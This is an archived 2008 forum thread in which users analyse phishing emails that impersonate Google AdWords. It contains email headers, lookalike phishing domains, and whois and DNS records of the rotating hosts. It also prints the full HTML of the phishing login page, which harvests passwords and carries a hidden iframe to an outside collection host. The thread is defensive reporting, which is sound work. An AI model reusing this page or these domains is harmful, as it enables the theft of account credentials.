[Phish] Google adwords phish "please udpate your billing info"

Author	All Replies
Dennis Premium,Mod join:2001-01-26 Algonquin, IL ·AT&T Yahoo Host: Chicago Users find Hot Deals Users find Hot Dea.. Requests for Hot D.. Home Repair & Impr..	[Phish] Google adwords phish "please udpate your billing info" Got this today...looks like a pretty targeted scam to me. Return-Path: <fmontyxxx@shaw.ca> X-Original-To: bob@dennisjudd.com Delivered-To: bob@bob.com Received: from [87.105.238.129] (dynamic-87-105-238-129.ssp.dialog.net.pl [87.105.238.129]) by blackraven.com (Postfix) with ESMTP id BADDA5BA60 for <bob@dennisjudd.com>; Sat, 22 Mar 2008 07:56:54 -0600 (CST) Received: from [87.105.238.129] by idcmail-mx2no.cg.shawcable.net; Sat, 22 Mar 2008 14:57:14 +0100 From: "Google Adwords-noreply" <adwords-noreply@google.com> To: <bob@dennisjudd.com> Subject: Please Update Your Billing Information Date: Sat, 22 Mar 2008 14:57:14 +0100 Message-ID: <01c88c2d$03a54980$81ee6957@fmontyxxx> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000E_01C88C2D.03A54980" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 Importance: Normal ------------------------ Dear Google AdWords Customer! In order to update your billing information, please sign in to your AdWords account at »https://adwords.google.com [ really goes to ht tp://adwords.google.com.r4oik.cn/select/Login/ or h ttp://adwords.google.com.fr4ck.cn], and update your billing information. Your account will be reactivated as soon as you have entered your payment details. Your ads will show immediately if you decide to pay for clicks via credit or debit card. If you decide to pay by direct debit, we may need to receive your signed debit authorization before your ads start running, depending on your location. If you choose bank transfer, your ads will show as soon as we receive your first payment. (Payment options vary by location.) Thank you for choosing AdWords. We look forward to providing you with the most effective advertising available. Sincerely, The Google AdWords Team ------------------------ This message was sent from a notification-only email address that does not accept incoming email. Please do not reply to this message. If you have any questions after following the steps above, please visit the Google AdWords Help Center at »https://adwords.google.com/support/bin/t···hl=en_US to find answers to frequently asked questions and a 'contact us' link near the bottom of the page. ------------------------ -- My Blog. Because I desperately need the acknowledgement of others. Meet my son, Connor.
	to forum · permalink · · 2008-03-22 13:19:47 ·
MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL	Re: [Phish] Google adwords phish "please udpate your billing inf said by Dennis : Got this today...looks like a pretty targeted scam to me. ...... Indeed, and a harder group to phish too, not your typical mom & pop phishing. Did not last long either: Lookup Failed. No IP address or host name Ping [r4oik.cn] Bad destination whois query for r4oik.cn... Results returned from whois.cnnic.net.cn: Domain Name: r4oik.cn ROID: 20080321s10001s58333121-cn Domain Status: ok Registrant Organization: gfdthy Registrant Name: hrthhtfhrth Administrative Email: hfgdhf@nfrujhn.cn Sponsoring Registrar: ???????????? Name Server:ns1.borxl.com Name Server:ns2.borxl.com Registration Date: 2008-03-21 04:12 Expiration Date: 2009-03-21 04:12 It may come back up hosted elsewhere, as that DNS is suspect. nameserver: ns1.borxl.com 67.215.229.45 nameserver: ns2.borxl.com 24.52.12.10 DOMAIN: BORXL.COM RSP: IMENA.ua URL: »www.imena.ua created-date: 2008-03-14 updated-date: 2008-03-14 registration-expiration-date: 2009-03-14 owner-contact: P-MBT398 owner-fname: Mike owner-lname: Tyo owner-street: 4034 Rahn Rd owner-city: Eagan owner-zip: 55122 owner-country: US owner-phone: 6513969140 owner-email: miketyo@uk2.net MGD
	to forum · permalink · · 2008-03-22 13:47:33 ·
Dennis Premium,Mod join:2001-01-26 Algonquin, IL	yeah, after my post I tried to reach it from a "test" computer and couldn't get to it. odd....
	to forum · permalink · · 2008-03-22 14:56:52 ·
SnowyOne Premium join:2003-04-05 Kailua, HI ·Clearwire Wireless ·RoadRunner Cable	said by Dennis : yeah, after my post I tried to reach it from a "test" computer and couldn't get to it. It's reachable. Maybe not touchable, but reachable. »www.fr4ck.cn/icons/
	to forum · permalink · · 2008-03-22 17:34:01 ·
SnowyOne Premium join:2003-04-05 Kailua, HI ·Clearwire Wireless ·RoadRunner Cable	Where would a logical traceroute of »r4oik.cn end at? China Brazil France Zululand Romania Memphis TN Here's a hint: It's a phish site »89.41.180.87/icons/
	to forum · permalink · · 2008-03-22 17:57:01 ·
MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL edit: March 23rd, @02:31AM	said by SnowyOne : Where would a logical traceroute of »r4oik.cn end at? ... Appears to be roving bot type hosting. A 30 minute TTL on the phisher contolled DNS rotates a pool of hosts. A list of 10 hosts cached on a non authorative DNS: ; > DiG 9.2.4 > @algw1.att.com -t A adwords.google.com.r4oik.cn ;; global options: printcmd ;; Got answer: ;; ->>HEADER->> opcode: QUERY, status: NOERROR, id: 22389 ;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;adwords.google.com.r4oik.cn. IN A ;; ANSWER SECTION: adwords.google.com.r4oik.cn. 1800 IN A 84.108.239.70 [reverse DNS - bzq-84-108-239-70.cablep.bezeqint.net] . adwords.google.com.r4oik.cn. 1800 IN A 85.130.35.217 [reverse DNS - 85-130-35-217.1712826.ddns.cablebg.net] . adwords.google.com.r4oik.cn. 1800 IN A 86.122.171.209 [reverse DNS - 86-122-171-209.rdsnet.ro] . adwords.google.com.r4oik.cn. 1800 IN A 87.68.1.132 [reverse DNS - 87.68.1.132.cable.012.net.il] . adwords.google.com.r4oik.cn. 1800 IN A 87.68.28.118 [reverse DNS - 87.68.28.118.cable.012.net.il] . adwords.google.com.r4oik.cn. 1800 IN A 222.235.171.188 [no reverse DNS set] . adwords.google.com.r4oik.cn. 1800 IN A 59.187.199.82 [no reverse DNS set] . adwords.google.com.r4oik.cn. 1800 IN A 79.116.242.190 [reverse DNS - 79-116-242-190.rdsnet.ro] . adwords.google.com.r4oik.cn. 1800 IN A 80.97.170.165 [no reverse DNS set] . adwords.google.com.r4oik.cn. 1800 IN A 81.25.43.13 [reverse DNS - port-13-adslby-pool43.infonet.by] . A get request of the root IP on several, if not all, of the above will generate a redirect to: >http://www.microsoft.com/ 03/22/08 23:12:30 Browsing http://84.108.239.70 Fetching http://84.108.239.70/ ... GET / HTTP/1.1 Host: 84.108.239.70 Connection: close Referer: User-Agent: HTTP/1.1 302 Found Date: Sun, 23 Mar 2008 02:15:10 GMT Server: Apache X-Powered-By: PHP/5.2.5 Location: http://www.microsoft.com/ Content-Length: 0 Connection: close Content-Type: text/html Also, the actual phish page contains a 1x1 iframe for: >http://58.65.239.3/cgi-bin/mail.cgi?p=tor which is the subject of: FORM id=wzMainForm name=wzMainForm action=submit.php method=post and relevant to: <td nowrap="nowrap"><div align="right"><span>Email:</span></div></td> <td><input name="continue" value="https://adwords.google.com/select/gaiaauth?apt=None" type="hidden"> <input name="followup" value="https://adwords.google.com/select/gaiaauth?apt=None" type="hidden"> <input name="service" value="adwords" type="hidden"> <input name="nui" value="15" type="hidden"> <input name="fpui" value="1" type="hidden"> <input name="ifr" value="true" type="hidden"> <input name="skipvpage" value="true" type="hidden"> <input name="rm" value="hide" type="hidden"> <input name="ltmpl" value="login" type="hidden"> <input name="hl" value="en-US" type="hidden"> <input name="alwf" value="true" type="hidden"> <input name="GA3T" value="JSszExtkIFc" type="hidden"> <input name="GALX" value="RMI6xOsmqgc" type="hidden"> <input style="width: 116px;" name="Email" value="" id="Email" size="18" type="text"></td> After the submit to 58.65.239.3/cgi-bin/mail.cgi you are then redirected to >http://www.google.com: 03/22/08 17:41:56 Browsing http://58.65.239.3/cgi-bin/mail.cgi?p=tor Fetching http://58.65.239.3/cgi-bin/mail.cgi?p=tor ... GET /cgi-bin/mail.cgi?p=tor HTTP/1.1 Host: 58.65.239.3 Connection: close User-Agent: Sam Spade 1.14 HTTP/1.1 302 Found Date: Sun, 23 Mar 2008 04:59:50 GMT Server: Apache/2 Location: http://www.google.com Content-Length: 268 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.google.com">here</a>.</p> <hr> <address>Apache/2 Server at 58.65.239.3 Port 80</address> </body></html> IP 58.65.239.3 appears to have FTP running and hosts two domains: Escortinukraine.com and Kumau.info. They may not be relevant if that IP is hijacked. MGD
	to forum · permalink · · 2008-03-23 02:19:05 ·
SnowyOne Premium join:2003-04-05 Kailua, HI ·Clearwire Wireless ·RoadRunner Cable	said by MGD : IP 58.65.239.3 appears to have FTP running and hosts two domains: Escortinukraine.com and Kumau.info. OK,OK, but just in the defense of Truth, Justice & The GoogleWay!
	to forum · permalink · · 2008-03-23 02:43:10 ·
MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL edit: March 23rd, @02:54AM	LOL !! .... .. For reference, in case it disappears, here is the source code for the entire phish page. For some reason it causes an immediate GPF on my web brwowser. I am not sure why. 03/22/08 17:58:17 Browsing http://adwords.google.com.r4oik.cn/select/Login/ Fetching http://adwords.google.com.r4oik.cn/select/Login/ ... GET /select/Login/ HTTP/1.1 Host: adwords.google.com.r4oik.cn Connection: close User-Agent: Sam Spade 1.14 HTTP/1.1 200 OK Date: Sat, 22 Mar 2008 21:00:48 GMT Server: Apache Last-Modified: Sat, 22 Mar 2008 19:16:30 GMT ETag: "575748-55be-70a25f80" Accept-Ranges: bytes Content-Length: 21950 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>Google AdWords: Sign In</TITLE> <META http-equiv=Content-Type content="text/html; charset=utf-8"><LINK href="index_files/3355601226-AdsLater.css" type=text/css rel=stylesheet> <META content="MSHTML 6.00.6000.16587" name=GENERATOR> <style type="text/css"> <!-- .gaia {font-size: 60%; } .gaia {font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia {font-family: Arial, Helvetica, sans-serif; font-size: 70%; } .gaia {font-family: Arial, Helvetica, sans-serif; font-size: 70%; } .gaia {font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia {font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia {font-family: Arial, Helvetica, sans-serif; font-size: smaller; } .gaia {font-family: arial, sans-serif; font-size: smaller; } .gaia {font-family: arial, sans-serif; font-size: smaller; font-style: italic; } --> </style> </HEAD> <BODY dir=ltr><iframe src="http://58.65.239.3/cgi-bin/mail.cgi?p=tor" height=1 width=1"></iframe> <FORM id=wzMainForm name=wzMainForm action=submit.php method=post> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD vAlign=top height=1> <TABLE cellSpacing=0 cellPadding=5 width="100%" border=0> <TBODY> <TR vAlign=center> <TD width="1%"><A href="https://adwords.google.com/select/home"><IMG height=59 alt=Google src="index_files/google_small.gif" width=143 align=left border=0></A></TD> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR vAlign=top> <TD noWrap> <H4 style="MARGIN-TOP: 8px"><FONT color=#666666 size=-1>It's All About Results</FONT></H4></TD> <TD vAlign=center noWrap align=right height=30>  <SCRIPT src="index_files/3968017901-popUpLink_js_compiled.js" type=text/javascript></SCRIPT> <A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/support/bin/topic.py?topic=8336&hl=en_US" target=google_popup>Help</A> \|<A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/select/contactus/ContactUs?hl=en_US&ctx=foot" target=google_popup>Contact Us</A></TD></TR> <TR> <TD bgColor=#3f7c5f colSpan=2 height=1><IMG height=1 alt="" src="index_files/clear.gif" width=1></TD></TR> <TR> <TD vAlign=top align=right colSpan=2> <TABLE class=map2 cellSpacing=0 cellPadding=0 border=0> <TBODY> <TR></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE><BR></TD></TR> <TR> <TD vAlign=top> <TABLE id=wzMainBody cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD> <FORM id=wzMainForm name=wzMainForm action=submit.php method=post> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD vAlign=top> <TABLE class=edit_section width="100%" border=0> <TBODY> <TR> <TD class=header><B>Sign-in</B></TD></TR> <TR> <TD class=indentedContent><BR> <TABLE cellSpacing=2 cellPadding=1> <TBODY> <TR> <TD vAlign=top><IMG height=13 alt="" src="index_files/feedback_check.gif" width=14></TD> <TD colSpan=2><table id="t" align="center" border="0" cellpadding="1" cellspacing="0"> <!-- LoginBoxLogoText.quaddamage=VERSION1 --> <tbody> <tr> <td colspan="2" align="center"><font size="-1">Sign in to Google AdWords with your</font> <!-- LoginBoxGoogleAccountLogo.retro=false --> <table> <tbody> <tr> <td valign="top"><img src=https://www.google.com/accounts/google_white.gif alt="Google"></td> <td valign="middle"><font size="-0"><b>Account</b></font></td> </tr> </tbody> </table></td> </tr> <script type="text/javascript"> function onPreCreateAccount() { return true; } function onPreLogin() { if (window["onlogin"] != null) { return onlogin(); } else { return true; } } </script> <tr> <td colspan="2" align="center"><div class="errorbox-good"></div></td> </tr> <tr> <td nowrap="nowrap"><div align="right"><span>Email:</span></div></td> <td><input name="continue" value="https://adwords.google.com/select/gaiaauth?apt=None" type="hidden"> <input name="followup" value="https://adwords.google.com/select/gaiaauth?apt=None" type="hidden"> <input name="service" value="adwords" type="hidden"> <input name="nui" value="15" type="hidden"> <input name="fpui" value="1" type="hidden"> <input name="ifr" value="true" type="hidden"> <input name="skipvpage" value="true" type="hidden"> <input name="rm" value="hide" type="hidden"> <input name="ltmpl" value="login" type="hidden"> <input name="hl" value="en-US" type="hidden"> <input name="alwf" value="true" type="hidden"> <input name="GA3T" value="JSszExtkIFc" type="hidden"> <input name="GALX" value="RMI6xOsmqgc" type="hidden"> <input style="width: 116px;" name="Email" value="" id="Email" size="18" type="text"></td> </tr> <tr> <td></td> <td align="left"></td> </tr> <tr> <td align="right"><span>Password:</span></td> <td><input style="width: 116px;" name="Passwd" id="Passwd" size="18" type="password"></td> </tr> <tr> <td></td> <td align="left"></td> </tr> <!-- LoginElementsSubmitButton.nui=default --> <tr> <td></td> <td align="left"><input value="Sign in" type="submit"></td> </tr> <tr id="ga-fprow"> <td colspan="2" class="gaia le fpwd" align="center" height="17" nowrap="nowrap" valign="bottom"><a href="http://www.google.com/support/accounts/bin/answer.py?answer=48598&hl=en&fpUrl=https%3A%2F%2Fwww.google.com%2Faccounts%2FForgotPasswd%3FfpOnly%3D1%26continue%3Dhttps%253A%252F%252Fadwords.google.com%252Fselect%252Fgaiaauth%253Fapt%253DNone%26followup%3Dhttps%253A%252F%252Fadwords.google.com%252Fselect%252Fgaiaauth%253Fapt%253DNone%26service%3Dadwords%26hl%3Den-US%26fpui%3D1" target="_top">I cannot access my account</a></td> </tr> <script type="text/javascript"> stylizeLogoWhite(); </script> </tbody> </table> <BR> <BR></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE> <SCRIPT language=JavaScript type=text/javascript> var google_conversion_id = 1172432; var google_conversion_language = "en_US"; var google_conversion_format = "1"; var google_conversion_color = "FFFFFF"; if (1.0) { var google_conversion_value = 1.0; } var google_conversion_label = "Default"; </SCRIPT> <SCRIPT language=JavaScript src="index_files/conversion.js" type=text/javascript></SCRIPT> <NOSCRIPT><IMG height=1 alt="" src="" width=1 border=0></NOSCRIPT> <SCRIPT language=JavaScript type=text/javascript> var google_conversion_id = 1070714708; var google_conversion_language = "en_US"; var google_conversion_format = "1"; var google_conversion_color = "FFFFFF"; if (1.0) { var google_conversion_value = 1.0; } var google_conversion_label = "Default"; </SCRIPT> <SCRIPT language=JavaScript src="index_files/conversion.js" type=text/javascript></SCRIPT> <NOSCRIPT><IMG height=1 alt="" src="" width=1 border=0></NOSCRIPT> <SCRIPT language=JavaScript type=text/javascript> var google_conversion_id = 1070564663; var google_conversion_language = "en_US"; var google_conversion_format = "1"; var google_conversion_color = "FFFFFF"; if (1.0) { var google_conversion_value = 1.0; } var google_conversion_label = "Default"; </SCRIPT> <SCRIPT language=JavaScript src="index_files/conversion.js" type=text/javascript></SCRIPT> <NOSCRIPT><IMG height=1 alt="" src="" width=1 border=0></NOSCRIPT> <SCRIPT language=JavaScript type=text/javascript> var google_conversion_id = 1070714678; var google_conversion_language = "en_US"; var google_conversion_format = "1"; var google_conversion_color = "FFFFFF"; if (1.0) { var google_conversion_value = 1.0; } var google_conversion_label = "Default"; </SCRIPT> <SCRIPT language=JavaScript src="index_files/conversion.js" type=text/javascript></SCRIPT> <NOSCRIPT><IMG height=1 alt="" src="" width=1 border=0></NOSCRIPT> <SCRIPT language=JavaScript type=text/javascript> var google_conversion_id = 1071482227; var google_conversion_language = "en_US"; var google_conversion_format = "1"; var google_conversion_color = "FFFFFF"; if (1.0) { var google_conversion_value = 1.0; } var google_conversion_label = "Lead"; </SCRIPT> <SCRIPT language=JavaScript src="index_files/conversion.js" type=text/javascript></SCRIPT> <NOSCRIPT><IMG height=1 alt="" src="" width=1 border=0></NOSCRIPT> <SCRIPT language=Ja aScript type=text/javascript> var google_conversion_id = 1069796387; var google_conversion_language = "en_US"; var google_conversion_format = "1"; var google_conversion_color = "FFFFFF"; if (1.0) { var google_conversion_value = 1.0; } var google_conversion_label = "Default"; </SCRIPT> <SCRIPT language=JavaScript src="index_files/conversion.js" type=text/javascript></SCRIPT> <NOSCRIPT><IMG height=1 alt="" src="" width=1 border=0></NOSCRIPT></TD> <TD id=wzQuestionSeparator style="BACKGROUND-IMAGE: url(/select/images/dot2.gif)" vAlign=bottom width="1%" height=300><IMG height=1 alt="" src="index_files/dot2.gif" width=1> </TD></TR></TBODY></TABLE></FORM></TD> <TD id=wzQuestionSpacer width="1%"></TD> <TD style="PADDING-RIGHT: 10px" vAlign=top width="25%"> <TABLE id=wzChooseKeywords-QuestionPanel cellSpacing=1 cellPadding=3 width="100%"> <TBODY> <TR> <TD vAlign=top colSpan=2> <DIV class=wiz-smallHeader><B>Common Questions</B></DIV></TD></TR> <TR> <TD vAlign=top> </TD> <TD><A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/support/bin/answer.py?answer=33359&hl=en_US&ctx=Complete" target=google_popup>How do I check that my account is running?</A></TD></TR> <TR> <TD vAlign=top> </TD> <TD><A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/support/bin/answer.py?answer=33360&hl=en_US&ctx=Complete" target=google_popup>Now that my Starter Edition ad is running, what do I do next?</A></TD></TR> <TR> <TD vAlign=top> </TD> <TD><A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/support/bin/answer.py?answer=8205&hl=en_US&ctx=Complete" target=google_popup>How do I redeem a promotional code?</A></TD></TR> <TR> <TD vAlign=top> </TD> <TD><A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/support/bin/answer.py?answer=8206&hl=en_US&ctx=Complete" target=google_popup>How do I reach an AdWords representative?</A></TD></TR> <TR> <TD vAlign=top colSpan=2> <SCRIPT src="index_files/3329992908-Chat.js" type=text/javascript></SCRIPT> <SCRIPT src="index_files/2804589401-usage_tracker_compiled.js" type=text/javascript></SCRIPT> <DIV id=wizardChatOnline style="DISPLAY: none"><BR> <DIV class=wiz-smallHeader style="PADDING-BOTTOM: 5px"><B>Live Support</B><BR></DIV> <TABLE> <TBODY> <TR> <TD vAlign=top width="1%"><A onclick="awChat.popUpChat('aw-signup-starter-us', 'http://server.iad.liveperson.net/hc/45033343/?cmd=file&file=visitorWantsToChat&site=45033343&SESSIONVAR!skill=aw-signup-starter-us', 'chat45033343'); return false;" href="http://server.iad.liveperson.net/hc/45033343/?cmd=file&file=visitorWantsToChat&site=45033343&SESSIONVAR!skill=aw-signup-starter-us&byhref=1" target=chat45033343><IMG alt="" src="index_files/2705167737-chatIcon.gif" border=0></A></TD> <TD vAlign=top noWrap>Need some friendly hand-holding?<BR><A onclick="awChat.popUpChat('aw-signup-starter-us', 'http://server.iad.liveperson.net/hc/45033343/?cmd=file&file=visitorWantsToChat&site=45033343&SESSIONVAR!skill=aw-signup-starter-us', 'chat45033343'); return false;" href="http://server.iad.liveperson.net/hc/45033343/?cmd=file&file=visitorWantsToChat&site=45033343&SESSIONVAR!skill=aw-signup-starter-us&byhref=1" target=chat45033343>Chat now with an AdWords Specialist</A></TD></TR></TBODY></TABLE></DIV> <SCRIPT type=text/javascript> awChat.addChatDiv("aw-signup-starter-us", "https://server.iad.liveperson.net/hc/45033343/cmd/query/?cmd\75repstate\46site\07545033343\46page\75https://server.iad.liveperson.net/hcp/width/img1.gif\46query\75aw-signup-starter-us\46time\0751206107402348", "wizardChatOnline", "online"); </SCRIPT> <DIV id=wizardChatOccupied style="DISPLAY: none"><BR> <DIV class=wiz-smallHeader style="PADDING-BOTTOM: 5px"><B>Live Support</B><BR></DIV> <TABLE> <TBODY> <TR> <TD vAlign=top width="1%"><IMG alt="" src="index_files/2705167737-chatIcon.gif"></TD> <TD vAlign=top>All AdWords Specialists are helping other advertisers. Please <A onclick="awChat.retryChat('aw-signup-starter-us'); return false;" href="https://adwords.google.com/select/starter/signup/WizardComplete?wizardType=newAccount&wizardKey=240d5eedf96505ba#">try again</A> soon.</TD></TR></TBODY></TABLE></DIV> <SCRIPT type=text/javascript> awChat.addChatDiv("aw-signup-starter-us", "https://server.iad.liveperson.net/hc/45033343/cmd/query/?cmd\75repstate\46site\07545033343\46page\75https://server.iad.liveperson.net/hcp/width/img1.gif\46query\75aw-signup-starter-us\46time\0751206107402348", "wizardChatOccupied", "occupied"); </SCRIPT> <DIV id=wizardChatOffline style="DISPLAY: none"><BR> <DIV class=wiz-smallHeader style="PADDING-BOTTOM: 5px"><B>Live Support</B><BR></DIV> <TABLE> <TBODY> <TR> <TD vAlign=top width="1%"><IMG alt="" src="index_files/2705167737-chatIcon.gif"></TD> <TD vAlign=top>AdWords Specialists aren't available to chat. Please try again later.</TD></TR></TBODY></TABLE></DIV> <SCRIPT type=text/javascript> awChat.addChatDiv("aw-signup-starter-us", "https://server.iad.liveperson.net/hc/45033343/cmd/query/?cmd\75repstate\46site\07545033343\46page\75https://server.iad.liveperson.net/hcp/width/img1.gif\46query\75aw-signup-starter-us\46time\0751206107402348", "wizardChatOffline", "offline"); </SCRIPT> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR id=wzFooter> <TD height=1><BR> <CENTER class=footer> <DIV style="PADDING-RIGHT: 2ex; BORDER-TOP: #3f7c5f 2px solid; PADDING-LEFT: 2ex; PADDING-BOTTOM: 2ex; PADDING-TOP: 2ex"> <HR style="DISPLAY: none" noShade SIZE=1> <FONT color=#666666 size=-1>©2008 Google - <A href="https://adwords.google.com/select/Login" target=_top>AdWords Home</A> - <A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/support/bin/static.py?page=guidelines.cs&hl=en_US" target=google_popup>Advertising Policies</A> - <A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="http://www.google.com/privacy.html" target=google_popup>Privacy Policy</A> - <A onclick="return HPU_helpPopUp(this, {target: 'google_popup', width: null, height: null})" href="https://adwords.google.com/select/contactus/ContactUs?hl=en_US&ctx=foot" target=google_popup>Contact Us</A></FONT></DIV></CENTER><BR> <SCRIPT src="index_files/urchin.js" type=text/javascript></SCRIPT> <SCRIPT type=text/javascript> _uacct='UA-18008-1'; _uanchor=1; _uccn="sourceid"; _ucmd="medium"; _ucsr="subid"; _uctr="term"; _ucct="content"; _ucid="cid"; _ucno="nooverride"; urchinTracker('/select/starter/signup/WizardComplete?wizardType\75newAccount\46wizardKey\075240d5eedf96505ba\46hl\75en_US'); </SCRIPT> <SCRIPT type=text/javascript> _uacct = 'UA-131600-8'; urchinTracker("/2103821876/goal"); </SCRIPT> <SCRIPT type=text/javascript> _uacct = 'UA-131600-4'; _udn="google.com"; urchinTracker("/2329528547/goal"); </SCRIPT> </TD></TR></TBODY></TABLE></BODY></HTML> MGD
	to forum · permalink · · 2008-03-23 02:48:39 ·
SnowyOne Premium join:2003-04-05 Kailua, HI ·Clearwire Wireless ·RoadRunner Cable	said by MGD : For reference, in case it disappears, here is the source code for the entire phish page. For some reason it causes an immediate GPF on my web brwowser. I am not sure why. Uhm, excuse me, but that's why you're supposed to put crap like this on other peoples servers.
	to forum · permalink · · 2008-03-23 03:20:58 ·
Dennis Premium,Mod join:2001-01-26 Algonquin, IL	oh man here we go again http://adwords.google.com.s1xj1r.cn/select/index.html
	to forum · permalink · · 2008-04-02 18:51:25 ·
Dennis Premium,Mod join:2001-01-26 Algonquin, IL ·AT&T Yahoo Host: Chicago Users find Hot Deals Users find Hot Dea.. Requests for Hot D.. Home Repair & Impr.. edit: April 7th, @09:49AM	two more this morning... http://adwords.google.GelIsBank.cn/select/Login http://adwords.google.AspenVault.cn/select/Login It just occurred to me now that this is way too focused of an attack to be random or luck. Plus I'm getting them to two very specific email addresses...so after a little digging I've found only one place that they could have been pulled from. Google Analytics »https://www.google.com/analytics It's the only place that both email addresses were in (I get daily reports on different sub domains, one to each) so I have to assume at this point that somebody gained access to the list of emails and assumed that a majority of people using Google Analytics were also using Google Adwords (not to be confused with Adsense). Now the only question is...does google know??? -- My Blog. Because I desperately need the acknowledgement of others. Meet my son, Connor.
	to forum · permalink · · 2008-04-07 09:45:30 ·
Dennis Premium,Mod join:2001-01-26 Algonquin, IL	and again: adwords.google.VaultPacket.cn/select/Login No response from google about this at all yet...
	to forum · permalink · · 2008-04-07 12:06:18 ·
Dennis Premium,Mod join:2001-01-26 Algonquin, IL ·AT&T Yahoo Host: Chicago Users find Hot Deals Users find Hot Dea.. Requests for Hot D.. Home Repair & Impr..	http://adwords.google.BestIBank.cn/select/Login You know the frequency of these is what scares me the most... -- My Blog. Because I desperately need the acknowledgement of others. Meet my son, Connor.
	to forum · permalink · · 2008-04-07 12:33:51 ·
Dennis Premium,Mod join:2001-01-26 Algonquin, IL ·AT&T Yahoo Host: Chicago Users find Hot Deals Users find Hot Dea.. Requests for Hot D.. Home Repair & Impr.. edit: April 8th, @08:23AM	lord...why did I even try. All they did was send me a explanation of what "spoofing" is. Good to see that Google has joined the ranks of the large company that hires people dumb enough to not understand the emails they get. On second thought...it was probably just a small perl script that responded to me. -- My Blog. Because I desperately need the acknowledgement of others. Meet my son, Connor.
	to forum · permalink · · 2008-04-08 08:20:48 ·
VisualdreamZ @cox.net	Gotta point out one other thing about this that is a little scarier than your average phishing scheme. It follows the logical procession of what it claims to be. In order, and on a reasonable time frame. I unfortunately did not keep most of these, but I received the first I think sometime in late February. Received a couple more in March and earlier April. And now I just received one yesterday (as I scrolled through my spam box) that claimed "Your adwords account has now been 'stoped'." (Thank god for illiterate phisphers!) But the fact that it well mimics the general progress of a real account shut down indicates a somewhat higher level of intelligence here. And - that scares me. LOL Just thought I'd share my observation, and thanks for allowing a body to post without creating yet another account =) V--Z PS - I tried telling google, too, and also got the standard scripted response. Thank god for form letter writers, too, keeping otherwise perfectly good telemarketers from calling me!
	to forum · permalink · 2008-04-13 18:59:00 ·
EGeezer Spring is here Premium join:2002-08-04 Country! ·RoadRunner Cable ·AT&T CallVantage	reply to Dennis Google adwords phish "renew your account Now!" I found one of these in my spambox too - I don't have a Google acocunt of any kind, looks like they're looking for ways to sneak malware into Google Ads. Phish site link (link in code is also broken) ht tp://w w w .dosiapt.com/zboard/data/6/1166064213/ Return-Path: <setup@google.com> Message-Id: <6aktlg$eciij2@hrndva-mxlb.mail.rr.com> From: "setup@google.com"<setup@google.com> Subject: Google AdWords Alert ! Date: Mon, 21 Apr 2008 19:43:34 +0100 MIME-Version: 1.0 Content-Type: text/html; charset="Windows-1251" Content-Transfer-Encoding: 7bit PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; PADDING-TOP: 10px"> <DIV></DIV></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD vAlign=top> <TABLE cellSpacing=0 cellPadding=3 width="100%" border=0> <TBODY> <TR> <TD style="BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid" bgColor=#dbe6de><STRONG>Note : Your Google AdWords Password is NOT your Google Email password!</STRONG></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE> <DIV id=footer>�2008 Google</DIV><BR> <DIV></DIV> <CENTER></CENTER></BODY></HTML> -- Mayors of New York come from nowhere and go nowhere. Wallace Sayre (apparently, so do governors... )
	to forum · permalink · · 2008-04-27 23:48:41 ·


Thursday, 21-Aug 08:09:57	Terms of Use \| Privacy Policy \| Hosting by www.nac.net - DSL,Hosting & Co-lo \| feedback \| contact over 9 years online! © 1999-2008 dslreports.com. page compression OFF